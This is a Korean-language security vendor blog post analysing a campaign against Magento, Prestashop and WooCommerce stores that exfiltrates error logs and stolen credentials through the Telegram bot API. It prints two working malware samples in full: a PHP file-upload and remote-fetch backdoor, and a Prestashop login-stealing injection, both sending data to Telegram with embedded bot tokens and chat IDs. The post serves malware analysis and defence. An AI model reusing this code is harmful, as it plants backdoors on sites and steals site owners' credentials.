최근 저희 보안 엔지니어들은 해커들이 널리 사용되는 암호화된 메시징 서비스 'Telegram'을 활용하여 멀웨어 캠페인의 오류 로그와 해킹된 사이트의 민감한 정보를 수신하는 야생에서 진행 중인 텔레그램 멀웨어 캠페인을 발견했습니다.
Telegram을 통해 해커에게 전송되는 오류 로그 또는 민감한 정보는 웹 사이트에 악성 코드가 성공적으로 심어졌는지 여부를 확인하기 위한 것이고, 다른 경우에는 악성 코드가 성공적으로 심어졌다면 다음의 민감한 정보를 보내는 것입니다. 특정 전보 번호 또는 채널로 피해자를 Magento, Prestashop 및 WooCommerce 매장은 여전히 이 해킹 캠페인의 주요 대상입니다.
많은 사이트가 타겟팅되고 있습니다.
보안 제공자로서 우리는 매일 비즈니스를 방해하는 최신 사이버 위협 및 맬웨어 캠페인을 지속적으로 모니터링합니다. 이 텔레그램 악성코드 캠페인에서 우리는 다수의 Magneto, Prestashop, WooCommerce 및 기타 CMS가 표적이 되는 것을 보았습니다.
일반적으로 해커는 웹사이트를 해킹하여 신용 카드 정보 또는 기타 민감한 데이터를 캡처할 때 서버에 API를 호출하거나 정보를 이메일로 보냅니다.
하지만 이 경우 공격자는 API 호출을 하거나 훔친 데이터를 특정 이메일 주소로 보내는 대신 텔레그램의 API를 통해 특정 텔레그램 번호/ID/채널로 전송하고 있다. 서버 IP 추적을 회피하기 위한 것입니다. 또는 블랙리스트 그리고 보안 텔레그램의 매체를 통해 오류 로그 또는 해킹된 데이터를 얻을 수 있습니다.
Magento 사이트에서 악성코드의 오류 로그를 수집하는 해커
이 텔레그램 악성코드 캠페인을 분석하는 동안 Ananda Krishna가 이끄는 연구팀은 해커가 무제한 파일을 업로드하거나 민감한 정보를 도용하기 위해 Magento 기반 사이트에 셸 스크립트를 적극적으로 심는 것을 발견했습니다. 악성코드 재배 과정에서 오류가 발생하면 해당 오류가 디버깅을 위해 해커의 텔레그램 번호/채널로 전송됩니다.
관련 블로그 – 해킹된 Magento 스토어 수정
추가 조사 후 우리 연구원들은 해커가 웹사이트에 악성 백도어를 생성하여 파일 코드를 생성 및 실행할 수 있음을 발견했습니다. 해커는 임의의 URL을 백도어 스크립트로 보낼 수 있습니다. 그러면 백도어 스크립트가 URL에서 파일을 다운로드하여 손상된 서버에 저장할 수 있습니다. 이 프로세스의 모든 단계에서 또는 오류가 발생한 경우 이 백도어 스크립트는 Telegram 메시지를 통해 해커에게 실시간 업데이트를 보냅니다.
해커는 악성 파일의 이름을 $_POST[‘name’]으로 보냈습니다. $_POST[‘content’] 변수 및 악성 파일 URL 변수.
다음은 우리가 검사한 손상된 사이트에서 발견된 악성 스크립트(맬웨어 스캐너에 의해 표시됨)의 예입니다.
해커는 $_POST[‘name’] = evil.php and $_POST[‘content’] = 으로 요청을 보냅니다. example.com/moreMaliciousCode.txt . 그런 다음 백도어 스크립트는 example.com/moreMaliciousCode.txt.에 있는 파일 내용으로 서버에 evil.php라는 파일을 생성합니다. 그런 다음 해커는 compromised-site.com/evil.php를 방문합니다. 나쁜 코드를 실행합니다.
일부 사이트에서는 해커가 이 백도어 스크립트를 사용하여 "파일 관리자" 스크립트 또는 "관리자"와 같은 데이터베이스 관리 도구를 만드는 것을 보았습니다. 이러한 도구를 사용하면 서버의 모든 파일을 조회/편집/삭제할 수 있으며 비밀번호, 이메일 주소, 신용 카드 번호 등과 같은 민감한 개인 식별 정보(PII)가 포함된 웹사이트 데이터베이스에 대한 전체 액세스 권한도 얻을 수 있습니다.
악성 코드 스니펫:
<?php
try{
if($_POST['action']=="wp_ajax_try_2020_v2"){
if(!empty ($_FILES['file']) and md5(md5(md5($_POST['token_admin'])))=="7ccda4acaa2341a049350d96fe88393b"){
if(function_exists("move_uploaded_file")){
@move_uploaded_file($_FILES['file']['tmp_name'],"../".$_FILES['file']['name']);
echo " file name : ".$_FILES['file']['name'];
}else{
die("no move_upload_file");
}
}else{
die(0);
}
exit();
}
if($_POST['action']=="wp_ajax_try_2020_v3"){
if(!empty ($_POST['content']) and md5(md5(md5($_POST['token_admin'])))=="7ccda4acaa2341a049350d96fe88393b"){
if(function_exists("file_get_contents")){
$html=file_get_contents($_POST['content']);
$save=fopen($_POST['name'],"w");
fwrite($save,$html);
fclose($save);
}else{
die("no file_get_contents");
}
}else{
die(0);
}
exit();
}
}catch (Exception $e) {
if(function_exists("file_get_contents")){
try{
file_get_contents("https://api.telegram.org/bot1234572065:AAGxojnCQEsIMuofDuQHaM-8wnM2VkYOMO4/sendMessage?chat_id=1110165405&text=" . urlencode($_SERVER['REMOTE_ADDR']." error wp")."" );
file_get_contents("https://api.telegram.org/bot1234572065:AAGxojnCQEsIMuofDuQHaM-8wnM2VkYOMO4/sendMessage?chat_id=1110165405&text=" . urlencode($e)."" );
}catch (Exception $e2) {}
}
}
?>Prestashop 사이트에서 정보를 훔치는 해커
Magento 사이트와 유사하게 해커는 Prestashop 사이트를 표적으로 삼고 Telegram API를 활용하여 사이트 소유자의 도난된 민감한 정보를 Telegram 번호/채널로 전송합니다.
이 경우 우리 연구원들은 해커가 이메일로 고객 세부 정보를 가져오기 위해 구현된 기능 을 우회하는 것을 보았습니다. classes/Customer.php 그리고 악성코드를 삽입하여 사이트 소유자의 이메일 주소와 비밀번호를 텔레그램 번호/채널로 전송합니다.
해킹 그룹의 이름은 B4JAT4X로 추정됩니다. (아래 코드 샘플에 언급된 대로):
if(isset($passwd)){
$passwordbaja=$passwd;
}elseif(isset($plaintextPassword)){
$passwordbaja=$plaintextPassword;
}
$djskfhsdfdjknjksnfjksfds = "------+| [ B" . "4" . "J" . "A" . "T" . "4" . "X ] |+-----\n";
$djskfhsdfdjknjksnfjksfds .= $email.":".$passwordbaja.":".$_SERVER['REMOTE_ADDR'].":".$_SERVER['SERVER_NAME']."\n";
file_get_contents("https://"."ap"."i".".tel"."egr"."am".".org"."/bot1"."211"."998273".":AAHft2yajX"."qGoX3y_"."K3lfPernQ"."DPbtspu3g"."/sendMessa"."ge?chat_id="."11101654"."05&text=" .
urlencode($djskfhsdfdjknjksnfjksfds)."" );이로 인해 Prestashop 사이트 소유자가 사용자의 신용 카드 정보를 Prestashop 사이트에 저장하는 경우 민감한 고객 정보를 도난당할 수 있습니다. 해커는 단순히 비밀번호를 사용하여 피해자의 사이트에 로그인하여 모든 정보를 볼 수 있습니다.
웹 보안 문제
사이버 위협 환경이 인터넷 중단으로 한 단계 더 확장됨에 따라 해커는 온라인 비즈니스를 무릎 꿇게 하기 위해 이와 같은 새로운 기술을 적극적으로 찾고 있습니다. 회사가 이와 같은 사이버 공격으로 인해 영향을 받는 경우 PII 위반 및 GDPR 위반도 발생할 수 있습니다.
이달 초 Malwarebytes는 웹사이트에서 신용 데이터를 훔쳐 텔레그램 메신저를 통해 해커에게 보내는 웹 스키머도 발견했습니다.
이 텔레그램 멀웨어 캠페인으로부터 웹사이트를 보호하려면 네트워크 수준에서 텔레그램에 대한 모든 연결을 차단하거나 웹 애플리케이션 방화벽을 사용하여 이러한 공격으로부터 사이트를 잘 보호하고 해커가 훔치는 것을 허용하지 않는 것이 좋습니다. 귀하의 민감한 데이터.
Astra의 애플리케이션 방화벽을 사용하는 경우 SQLi, XSS, CSRF, LFI, RFI, 신용 카드 해킹, 스팸, 악성 봇 등과 같은 이 공격 및 기타 사이버 공격 및 취약성으로부터 이미 보호되고 있습니다.
또한 Astra의 머신 러닝 기반 맬웨어 스캐너는 자동으로 웹 사이트를 정기적으로 스캔하고 웹 사이트의 모든 외부 요소와 사건에 플래그를 지정할 수 있습니다. 여기에는 새로운 악성 파일의 추가 또는 기존 파일의 수정이 포함됩니다. Astra 악성 코드 스캐너의 '파일 차이 보기' 기능을 사용하면 대시보드 내에서 모든 변경 사항을 검토하고 버튼 클릭 한 번으로 악성 파일을 삭제할 수도 있습니다.
보안 전문가들은 웹사이트의 안전을 위한 핵심 보안 조치로 정기적인 맬웨어 검사를 오랫동안 권장해 왔습니다. 이제 웹사이트를 항상 보호할 수 있는 적절한 보안 조치를 취해야 할 때입니다.